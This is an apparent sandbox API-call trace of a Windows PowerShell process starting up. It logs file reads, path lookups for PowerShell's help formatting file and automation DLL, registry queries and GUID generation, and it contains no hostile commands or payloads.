	[0755.054] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.054] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.055] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.055] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.055] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.056] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.056] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.056] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.057] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.057] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.058] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0755.058] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0756.502] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0756.502] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x1000, lpOverlapped=0x0) returned 1
	[0756.502] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0xf37, lpOverlapped=0x0) returned 1
	[0756.503] ReadFile (in: hFile=0x310, lpBuffer=0x335f887, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x335f887*, lpNumberOfBytesRead=0xed018*=0x0, lpOverlapped=0x0) returned 1
	[0756.503] ReadFile (in: hFile=0x310, lpBuffer=0x33601e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xed018, lpOverlapped=0x0 | out: lpBuffer=0x33601e8*, lpNumberOfBytesRead=0xed018*=0x0, lpOverlapped=0x0) returned 1
	[0756.503] CloseHandle (hObject=0x310) returned 1
	[0756.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0756.504] SetErrorMode (uMode=0x1) returned 0x1
	[0756.504] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xecfc0 | out: lpFileInformation=0xecfc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0756.504] SetErrorMode (uMode=0x1) returned 0x1
	[0756.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0756.504] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed0a8 | out: phkResult=0xed0a8*=0x310) returned 0x0
	[0756.504] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed02c, lpData=0x0, lpcbData=0xed028*=0x0 | out: lpType=0xed02c*=0x1, lpData=0x0, lpcbData=0xed028*=0x56) returned 0x0
	[0756.504] CoTaskMemAlloc (cb=0x5a) returned 0x39aab0
	[0756.504] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecffc, lpData=0x39aab0, lpcbData=0xecff8*=0x56 | out: lpType=0xecffc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xecff8*=0x56) returned 0x0
	[0756.504] CoTaskMemFree (pv=0x39aab0) 
	[0756.505] RegCloseKey (hKey=0x310) returned 0x0
	[0756.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0756.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xecba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0756.510] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xaab32b75, Data2=0xbfc0, Data3=0x407b, Data4=([0]=0x91, [1]=0xe3, [2]=0xb, [3]=0xfe, [4]=0x8f, [5]=0x1d, [6]=0x5d, [7]=0xa8))) returned 0x0
	[0756.510] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xfbac91af, Data2=0xd5ea, Data3=0x4be2, Data4=([0]=0x89, [1]=0x6, [2]=0xc, [3]=0xec, [4]=0xe6, [5]=0x41, [6]=0xe3, [7]=0xe1))) returned 0x0
	[0756.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.527] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xbe3f9c3a, Data2=0x29d8, Data3=0x4833, Data4=([0]=0xa7, [1]=0x63, [2]=0x3d, [3]=0x9a, [4]=0x70, [5]=0xb6, [6]=0xb5, [7]=0x3))) returned 0x0
	[0756.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.531] VirtualQuery (in: lpAddress=0xeb2e0, lpBuffer=0xec1a0, dwLength=0x30 | out: lpBuffer=0xec1a0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0756.532] VirtualQuery (in: lpAddress=0xeb370, lpBuffer=0xec230, dwLength=0x30 | out: lpBuffer=0xec230*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0756.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.534] VirtualQuery (in: lpAddress=0xebaf0, lpBuffer=0xec9b0, dwLength=0x30 | out: lpBuffer=0xec9b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0756.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.535] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.536] VirtualQuery (in: lpAddress=0xebaf0, lpBuffer=0xec9b0, dwLength=0x30 | out: lpBuffer=0xec9b0*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0756.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0756.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0757.901] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xf7379ce8, Data2=0xd22, Data3=0x4c04, Data4=([0]=0xa4, [1]=0x1d, [2]=0xc7, [3]=0x15, [4]=0xe4, [5]=0x59, [6]=0xf7, [7]=0x36))) returned 0x0
	[0757.917] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xf23b6729, Data2=0xdca5, Data3=0x4a1f, Data4=([0]=0x9a, [1]=0xb5, [2]=0x4c, [3]=0x68, [4]=0xed, [5]=0xbc, [6]=0x93, [7]=0xf8))) returned 0x0
	[0757.917] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xff8e379d, Data2=0xfe8a, Data3=0x483b, Data4=([0]=0xbd, [1]=0x2c, [2]=0x25, [3]=0x88, [4]=0x39, [5]=0xe5, [6]=0xb7, [7]=0x3a))) returned 0x0
	[0757.920] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x4607a181, Data2=0x6102, Data3=0x493b, Data4=([0]=0xa5, [1]=0x85, [2]=0x8a, [3]=0x9d, [4]=0xfd, [5]=0x57, [6]=0x32, [7]=0xd0))) returned 0x0
	[0757.920] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x99434b37, Data2=0xc9d3, Data3=0x4c53, Data4=([0]=0x91, [1]=0x5d, [2]=0xa3, [3]=0xf6, [4]=0x85, [5]=0xae, [6]=0x1, [7]=0xc1))) returned 0x0
	[0757.921] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x29e9d888, Data2=0xfbb1, Data3=0x4975, Data4=([0]=0x9a, [1]=0x51, [2]=0xbe, [3]=0x60, [4]=0x57, [5]=0x4b, [6]=0x46, [7]=0x20))) returned 0x0
	[0757.921] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x6df58b3e, Data2=0xc73a, Data3=0x40bc, Data4=([0]=0x80, [1]=0x3a, [2]=0xb9, [3]=0x20, [4]=0x80, [5]=0x6e, [6]=0x40, [7]=0xc8))) returned 0x0
	[0757.921] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x5dfb5837, Data2=0xbbbc, Data3=0x4f89, Data4=([0]=0xa7, [1]=0x43, [2]=0xe8, [3]=0xd0, [4]=0xdd, [5]=0x14, [6]=0x95, [7]=0x23))) returned 0x0
	[0757.921] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x391f7d8f, Data2=0x6a3c, Data3=0x4fea, Data4=([0]=0xb4, [1]=0x75, [2]=0x76, [3]=0x81, [4]=0xf, [5]=0x8f, [6]=0x6f, [7]=0x18))) returned 0x0
	[0757.921] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xa0224c28, Data2=0xd903, Data3=0x48f7, Data4=([0]=0x82, [1]=0x83, [2]=0xe1, [3]=0xa, [4]=0xa4, [5]=0xf4, [6]=0xdb, [7]=0x24))) returned 0x0
	[0757.922] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x2c197814, Data2=0xa0aa, Data3=0x451f, Data4=([0]=0x9d, [1]=0x7c, [2]=0x4f, [3]=0x5a, [4]=0xee, [5]=0x37, [6]=0xba, [7]=0x52))) returned 0x0
	[0757.922] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xf26d56c8, Data2=0xdcd, Data3=0x44eb, Data4=([0]=0x85, [1]=0x13, [2]=0xd7, [3]=0x1b, [4]=0xaf, [5]=0xe6, [6]=0x84, [7]=0xfa))) returned 0x0
	[0757.923] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xeb7b2c50, Data2=0x8dfb, Data3=0x429d, Data4=([0]=0xab, [1]=0x9d, [2]=0xd2, [3]=0x41, [4]=0xc0, [5]=0xa5, [6]=0xd4, [7]=0x3a))) returned 0x0
	[0757.924] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0x13d61c02, Data2=0x2598, Data3=0x4640, Data4=([0]=0x97, [1]=0xce, [2]=0xe6, [3]=0xe8, [4]=0x35, [5]=0x99, [6]=0x7c, [7]=0xb4))) returned 0x0
	[0757.925] CoCreateGuid (in: pguid=0xed2d0 | out: pguid=0xed2d0*(Data1=0xdbf7a220, Data2=0xecb1, Data3=0x4123, Data4=([0]=0x95, [1]=0x50, [2]=0x17, [3]=0xa2, [4]=0x3b, [5]=0x3c, [6]=0x3d, [7]=0xb3))) returned 0x0
